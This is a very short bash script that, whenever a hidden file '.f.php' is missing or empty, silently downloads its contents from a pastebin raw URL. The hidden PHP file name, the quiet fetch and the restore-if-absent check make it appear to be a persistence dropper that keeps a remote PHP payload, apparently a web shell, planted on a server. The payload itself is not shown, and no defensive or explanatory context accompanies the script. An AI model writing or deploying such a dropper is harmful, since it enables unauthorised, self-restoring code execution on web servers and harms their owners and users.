#!/bin/bash

FILE=".f.php" 
URL="https://pastebin.com/raw/QgJUH1GR"

if [ ! -f "$FILE" ] || [ ! -s "$FILE" ]; then
    wget -q "$URL" -O "$FILE"
fi
